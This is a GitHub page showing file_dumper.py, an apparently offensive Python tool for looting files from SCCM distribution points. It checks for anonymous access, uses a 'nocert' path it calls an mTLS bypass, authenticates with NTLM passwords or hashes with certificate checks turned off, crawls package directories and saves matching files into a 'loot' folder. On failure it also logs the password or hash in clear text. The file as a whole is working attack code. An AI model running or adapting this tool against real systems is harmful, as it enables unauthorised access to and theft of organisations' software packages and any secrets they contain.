-
Notifications
You must be signed in to change notification settings - Fork 32
Expand file tree
/
Copy pathfile_dumper.py
More file actions
231 lines (205 loc) · 10.7 KB
/
file_dumper.py
File metadata and controls
231 lines (205 loc) · 10.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
import os
import string
import random
import urllib
import logging
import requests
import traceback
from requests_ntlm import HttpNtlmAuth
from bs4 import BeautifulSoup
from conf import bcolors, ANONYMOUSDP, DP_DOWNLOAD_HEADERS
logger = logging.getLogger(__name__)
requests.packages.urllib3.disable_warnings()
class FileDumper():
def __init__(self, distribution_point,
output_dir,
extensions,
anonymous,
urls,
recursion_depth,
username,
password,
pki_cert,
pki_key,
nocert
):
self.distribution_point = distribution_point
self.output_dir = output_dir
self.extensions = extensions
self.anonymous = anonymous
self.urls = urls
self.recursion_depth = recursion_depth
self.username = username
self.password = password
self.pki_cert = pki_cert
self.pki_key = pki_key
self.nocert = nocert
self.use_https = True if self.distribution_point.startswith('https://') else False
self.package_ids = set()
self.session = requests.Session()
self.session.headers.update(DP_DOWNLOAD_HEADERS)
if username is not None and password is not None:
self.session.auth = HttpNtlmAuth(username, password)
if self.use_https:
if nocert:
logger.info("[INFO] HTTPS required. Using nocert endpoint for mTLS bypass")
else:
logger.info("[INFO] HTTPS required. Using client certificate authentication")
self.session.cert = (pki_cert, pki_key)
self.session.verify = False
@staticmethod
def print_tree(d, out, prefix=""):
keys = list(d.keys())
for i, key in enumerate(keys):
is_last = (i == len(keys) - 1)
if isinstance(d[key], dict):
out.write(f"{prefix}{'└── ' if is_last else '├── '}{key}/\n")
new_prefix = f"{prefix}{' ' if is_last else '│ '}"
FileDumper.print_tree(d[key], out, new_prefix)
else:
out.write(f"{prefix}{'└── ' if is_last else '├── '}{key}\n")
@staticmethod
def check_anonymous_DP_connection_enabled(distribution_point, nocert):
characters = string.ascii_letters
random_string = ''.join(random.choice(characters) for i in range(8))
if nocert:
logger.info(f"[INFO] Checking anonymous DP Connection with URL {distribution_point}/nocert_sms_dp_smspkg$/{random_string}")
r = requests.get(f"{distribution_point}/nocert_sms_dp_smspkg$/{random_string}", headers=DP_DOWNLOAD_HEADERS, verify=False)
else:
logger.info(f"[INFO] Checking anonymous DP Connection with URL {distribution_point}/sms_dp_smspkg$/{random_string}")
r = requests.get(f"{distribution_point}/sms_dp_smspkg$/{random_string}", headers=DP_DOWNLOAD_HEADERS, verify=False)
logger.info(f"[INFO] Request returned status code {r.status_code}")
if r.status_code == 404:
return ANONYMOUSDP.ENABLED.value
elif r.status_code == 401:
return ANONYMOUSDP.DISABLED.value
elif r.status_code == 403:
return ANONYMOUSDP.CLIENTCERT.value
else:
return ANONYMOUSDP.UNKNOWN.value
def check_credentials_before_download(self):
characters = string.ascii_letters
random_string = ''.join(random.choice(characters) for i in range(8))
if self.nocert:
logger.info(f"[INFO] Checking credentials with URL {self.distribution_point}/nocert_sms_dp_smspkg/{random_string}")
r = self.session.get(f"{self.distribution_point}/nocert_sms_dp_smspkg$/{random_string}")
else:
logger.info(f"[INFO] Checking credentials with URL {self.distribution_point}/sms_dp_smspkg$/{random_string}")
r = self.session.get(f"{self.distribution_point}/sms_dp_smspkg$/{random_string}")
logger.info(f"[INFO] Request returned status code {r.status_code}")
if r.status_code == 404:
return True
else:
return False
def recursive_package_directory_fetch(self, object, directory, depth):
depth += 1
r = self.session.get(directory)
soup = BeautifulSoup(r.content, 'html.parser')
files = []
for href in soup.find_all('a'):
link_target = href.get('href').replace('http://', 'https://') if self.use_https is True else href.get('href')
previous_sibling = href.find_previous_sibling(string=True)
if previous_sibling and 'dir' in previous_sibling:
if depth <= self.recursion_depth:
object[link_target] = {}
self.recursive_package_directory_fetch(object[link_target], link_target, depth)
else:
logger.info("[INFO] Reached recursion depth limit")
object[link_target] = "Not entering this subdirectory - recursion depth limit reached"
else:
files.append(link_target)
for file in files:
object[file] = None
def recursive_file_extract(self, data):
to_download = []
if isinstance(data, dict):
for key, value in data.items():
if value is None and key.endswith(tuple(self.extensions)):
to_download.append(key)
else:
to_download.extend(self.recursive_file_extract(data[key]))
return to_download
def download_files(self, files):
for file in files:
try:
parsed_url = urllib.parse.urlparse(file)
filename = '__'.join(parsed_url.path.split('/')[3:])
package = parsed_url.path.split('/')[2]
r = self.session.get(file)
output_file = f"loot/{self.output_dir}/packages/{package}/{filename}"
with open(output_file, 'wb') as f:
f.write(r.content)
logger.warning(f"[*] Package {package} - downloaded file {filename}")
except:
logger.error(f"{bcolors.FAIL}[!] (Skipping) Error when handling the following file: {file}{bcolors.ENDC}")
traceback.print_exc()
def download_target_files(self):
if self.urls is not None:
with open(self.urls, 'r') as f:
contents = f.read().splitlines()
package_ids = set()
to_download = []
for file in contents:
try:
package_ids.add(urllib.parse.urlparse(file).path.split('/')[2])
if file.strip() is not None: to_download.append(file)
except:
logger.error(f"{bcolors.FAIL}[!] (Skipping) URL has wrong format: {file}{bcolors.ENDC}")
continue
for package_id in package_ids:
os.makedirs(f'loot/{self.output_dir}/packages/{package_id}', exist_ok=True)
self.download_files(to_download)
else:
self.handle_packages()
def fetch_package_ids_from_datalib(self):
if self.nocert:
r = self.session.get(f"{self.distribution_point}/nocert_sms_dp_smspkg$/datalib")
else:
r = self.session.get(f"{self.distribution_point}/sms_dp_smspkg$/datalib")
soup = BeautifulSoup(r.content, 'html.parser')
for a in soup.find_all('a'):
parts = a.get('href').split('/')
last_part = parts[-1].strip()
if not last_part.endswith('.INI'):
self.package_ids.add(last_part)
logger.warning(f"{bcolors.OKGREEN}[+] Found {len(self.package_ids)} packages{bcolors.ENDC}")
logger.info(self.package_ids)
def handle_packages(self):
with open(f"loot/{self.output_dir}/index.txt", "a") as f:
for i, package_id in enumerate(self.package_ids):
package_index = {package_id: {}}
if self.nocert:
self.recursive_package_directory_fetch(package_index[package_id], f"{self.distribution_point}/nocert_sms_dp_smspkg$/{package_id}", 0)
else:
self.recursive_package_directory_fetch(package_index[package_id], f"{self.distribution_point}/sms_dp_smspkg$/{package_id}", 0)
FileDumper.print_tree(package_index, f)
to_download = self.recursive_file_extract(package_index[package_id])
if len(to_download) == 0:
print(f"{bcolors.BOLD}[*] Handled package {package_id} ({i+1}/{len(self.package_ids)}){bcolors.ENDC}", end='\r')
continue
os.makedirs(f'loot/{self.output_dir}/packages/{package_id}', exist_ok=True)
self.download_files(to_download)
print(f"{bcolors.BOLD}[*] Handled package {package_id} ({i+1}/{len(self.package_ids)}){bcolors.ENDC}", end='\r')
logger.warning("\n[+] Package handling complete")
def dump_files(self):
if self.anonymous == ANONYMOUSDP.ENABLED.value:
logger.warning(f"[*] Anonymous Distribution Point connection is enabled. Dumping without authentication.")
if self.urls is None:
self.fetch_package_ids_from_datalib()
logger.warning(f"{bcolors.OKCYAN}\n[*] Starting unauthenticated file download with target extensions {self.extensions}{bcolors.ENDC}")
else:
logger.warning(f"{bcolors.OKCYAN}\n[*] Starting unauthenticated file download from URLs in '{self.urls}'{bcolors.ENDC}")
self.download_target_files()
else:
result = self.check_credentials_before_download()
if result is not True:
logger.warning(f"{bcolors.FAIL}[-] It seems like provided credentials do not allow to successfully authenticate to the distribution point.{bcolors.ENDC}")
logger.warning(f"{bcolors.FAIL}Potential explanations: HTTPS enforced on distribution point and invalid/no client certificate supplied; wrong credentials.{bcolors.ENDC}")
logger.warning(f"{bcolors.FAIL}Attempted username: '{self.username}' - attempted password/hash: '{self.password}{bcolors.ENDC}'")
return
if self.urls is None:
self.fetch_package_ids_from_datalib()
logger.warning(f"{bcolors.OKCYAN}\n[*] Starting authenticated file download with target extensions {self.extensions}{bcolors.ENDC}")
else:
logger.warning(f"{bcolors.OKCYAN}\n[*] Starting authenticated file download from URLs in '{self.urls}'{bcolors.ENDC}")
self.download_target_files()